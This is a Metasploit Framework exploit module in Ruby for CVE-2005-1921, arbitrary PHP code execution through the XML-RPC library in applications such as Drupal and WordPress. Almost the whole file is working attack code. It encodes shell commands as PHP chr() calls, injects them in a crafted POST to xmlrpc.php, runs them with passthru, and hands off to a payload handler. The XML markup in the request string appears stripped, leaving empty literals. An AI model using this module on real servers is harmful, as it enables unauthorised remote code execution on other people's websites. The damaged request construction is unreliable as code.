## # $Id$ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient # XXX This module needs an overhaul def initialize(info = {}) super(update_info(info, 'Name' => 'PHP XML-RPC Arbitrary Code Execution', 'Description' => %q{ This module exploits an arbitrary code execution flaw discovered in many implementations of the PHP XML-RPC module. This flaw is exploitable through a number of PHP web applications, including but not limited to Drupal, Wordpress, Postnuke, and TikiWiki. }, 'Author' => [ 'hdm', 'cazz' ], 'License' => MSF_LICENSE, 'Version' => '$Revision$', 'References' => [ ['CVE', '2005-1921'], ['OSVDB', '17793'], ['BID', '14088'], ], 'Privileged' => false, 'Platform' => ['unix', 'solaris'], 'Payload' => { 'Space' => 512, 'DisableNops' => true, 'Keys' => ['cmd', 'cmd_bash'], }, 'Targets' => [ ['Automatic', { }], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Jun 29 2005' )) register_options( [ OptString.new('PATH', [ true, "Path to xmlrpc.php", '/xmlrpc.php']), ], self.class ) deregister_options( 'HTTP::junk_params', # not your typical POST, so don't inject params. 'HTTP::junk_slashes' # For some reason junk_slashes doesn't always work, so turn that off for now. ) end def go(command) encoded = command.unpack("C*").collect{|x| "chr(#{x})"}.join('.') wrapper = rand_text_alphanumeric(rand(128)+32) cmd = "echo('#{wrapper}'); passthru(#{ encoded }); echo('#{wrapper}');;" xml = '' + "" + ""+ rand_text_alphanumeric(rand(128)+32) + "" + "" + "" + rand_text_alphanumeric(rand(128)+32) + "');#{cmd}//" + "" + rand_text_alphanumeric(rand(128)+32) + "" + "" + ""; res = send_request_cgi({ 'uri' => datastore['PATH'], 'method' => 'POST', 'ctype' => 'application/xml', 'data' => xml, }, 5) if (res and res.body) b = /#{wrapper}(.*)#{wrapper}/sm.match(res.body) if b return b.captures[0] elsif datastore['HTTP::chunked'] == true b = /chunked Transfer-Encoding forbidden/.match(res.body) if b raise RuntimeError, 'Target PHP installation does not support chunked encoding. Support for chunked encoded requests was added to PHP on 12/15/2005, try disabling HTTP::chunked and trying again.' end end end return nil end def check response = go("echo ownable") if (!response.nil? and response =~ /ownable/sm) return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe end def exploit response = go(payload.encoded) if response == nil print_status('exploit failed') else if response.length == 0 print_status('exploit successful') else print_status("Command returned #{response}") end handler end end end